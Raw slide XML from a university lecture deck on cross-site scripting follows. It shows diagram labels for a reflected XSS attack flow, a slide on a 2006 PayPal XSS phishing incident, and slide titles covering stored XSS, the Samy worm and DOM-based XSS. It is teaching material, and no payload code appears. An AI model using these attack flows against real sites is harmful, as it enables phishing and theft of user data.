          <p:cNvPr id="4109" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2807304" y="2285484"/>
            <a:ext cx="214033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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send malicious email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17420" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="99060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7421" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049590" y="4085708"/>
            <a:ext cx="16541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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17422" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319340" y="4536559"/>
            <a:ext cx="26384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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17423" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1949451"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17424" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209802" y="2606675"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17425" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714627" y="3705226"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17426" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324349"/>
            <a:ext cx="3352800" cy="1162051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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17427" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387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7428" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3028295" y="2764908"/>
            <a:ext cx="19412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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17429" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514602" y="3048000"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17430" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028827" y="4006851"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr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9600" y="1676400"/>
            <a:ext cx="143039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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17432" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="77311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           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>2006 Example Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Victims were then redirected to a phishing site and prompted to enter sensitive financial data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>			Source: http://www.acunetix.com/news/paypal.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 2" descr="PayPal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 r="41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="533400"/>
            <a:ext cx="1778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38188</TotalTime>
  <Words>768</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>180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Module 6.3 Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>XSS example: vulnerable site</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>            2006 Example Vulnerability</vt:lpstr>
      <vt:lpstr>Adobe PDF viewer “feature”</vt:lpstr>
      <vt:lpstr>Here’s how the attack works:</vt:lpstr>
      <vt:lpstr>And if that doesn’t bother you...</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy worm)</vt:lpstr>
      <vt:lpstr>Stored XSS using images</vt:lpstr>
      <vt:lpstr>DOM-based XSS (no server used)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6: Web Server Side Security</dc:title>
  <dc:creator>cse</dc:creator>
  <cp:lastModifiedBy>Deepak Kumar</cp:lastModifiedBy>
  <cp:revision>3775</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-11T05:13:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-19T16:56:48Z</dcterms:modified>
</cp:coreProperties>
</file>